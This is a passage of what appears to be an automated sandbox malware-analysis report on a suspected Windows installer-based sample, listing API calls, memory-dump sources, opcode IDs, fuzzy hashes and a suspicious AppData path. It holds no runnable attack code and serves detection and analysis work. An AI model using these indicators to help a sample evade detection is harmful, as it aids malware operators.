                                        • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                        • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                        • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                        • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                        • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                        APIs
                                        • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                        • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                        • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                        • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                        APIs
                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString
                                        • String ID:
                                        • API String ID: 1096422788-0
                                        • Opcode ID: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
                                        • Instruction ID: df176f915953132b0bb271560c482e71de85830ffa73b9ff1be2ff384974574c
                                        • Opcode Fuzzy Hash: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
                                        • Instruction Fuzzy Hash: 4AE04F30800208BBDF01AFA4CE49DBD3B79AF00344F14043AF940AB0D5E7F89A819749
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                        • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                        • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                        • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                        APIs
                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
                                        • Instruction ID: 76ab245bb7d1846facc95ba49394d78ca693920881c876aece34d531b1437416
                                        • Opcode Fuzzy Hash: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
                                        • Instruction Fuzzy Hash: 9EC09B717407007FDA118F60AD49F1777646B54741F1484397340F50E0C774E450D61C
                                        APIs
                                        • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                        • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                        • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                        • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                        • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                        • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                        • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00403F13), ref: 00404145
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 907d679711b6e1fb013299f82933437f2b692bd2f0f22f99d2ac99a58bd0a5b7
                                        • Instruction ID: 5fcfa7c36487df69233f4cfa323b79a9e92b7b04130a7d859801dd3b00291f76
                                        • Opcode Fuzzy Hash: 907d679711b6e1fb013299f82933437f2b692bd2f0f22f99d2ac99a58bd0a5b7
                                        • Instruction Fuzzy Hash: 2EA00275548601DBCE115B50DF45D057B61A7A47017514579A1855103486314461EB59
                                        APIs
                                        • Sleep.KERNELBASE(00000000), ref: 004014E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 073d7dbc2332f78e70a8dd90dac9131f6f5b323190ef4269eb60dea87001c778
                                        • Instruction ID: da611c00f68309ce38524c53dd600884bbe3bd0769c2f60ab2efe4a782d3f0b5
                                        • Opcode Fuzzy Hash: 073d7dbc2332f78e70a8dd90dac9131f6f5b323190ef4269eb60dea87001c778
                                        • Instruction Fuzzy Hash: ADD0C977B141009BD710EFB9AE898AA73A8EB913293254837D902E50A2D578D801562C
                                        APIs
                                        • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: AllocGlobal
                                        • String ID:
                                        • API String ID: 3761449716-0
                                        • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                        • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                        • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                        • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                        • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                        • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                        • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                        • DeleteObject.GDI32(00000000), ref: 00404C26
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                        • ShowWindow.USER32(?,00000005), ref: 00404D80
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                        • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                        • GlobalFree.KERNEL32(?), ref: 00404F60
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                        • ShowWindow.USER32(?,00000000), ref: 004050FF
                                        • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                        • ShowWindow.USER32(00000000), ref: 00405111
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 1638840714-813528018
                                        • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                        • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                        • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                        • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                        • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                        • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                        • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                        • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                        • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                          • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                          • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                          • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                          • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\5WP9WCM8qV.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                          • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                        • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                          • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                          • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                          • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen$Call
                                        • API String ID: 2624150263-1985349926
                                        • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                        • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                        • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                        • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                        APIs
                                          • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                        • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                        • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                        • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                        • GlobalFree.KERNEL32(?), ref: 10001D83
                                        • GlobalFree.KERNEL32(?), ref: 10001D88
                                        • GlobalFree.KERNEL32(?), ref: 10001D8D
                                        • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                        • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Global$Free$lstrcpy$Alloc
                                        • String ID:
                                        • API String ID: 4227406936-0
                                        • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                        • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                        • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                        • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
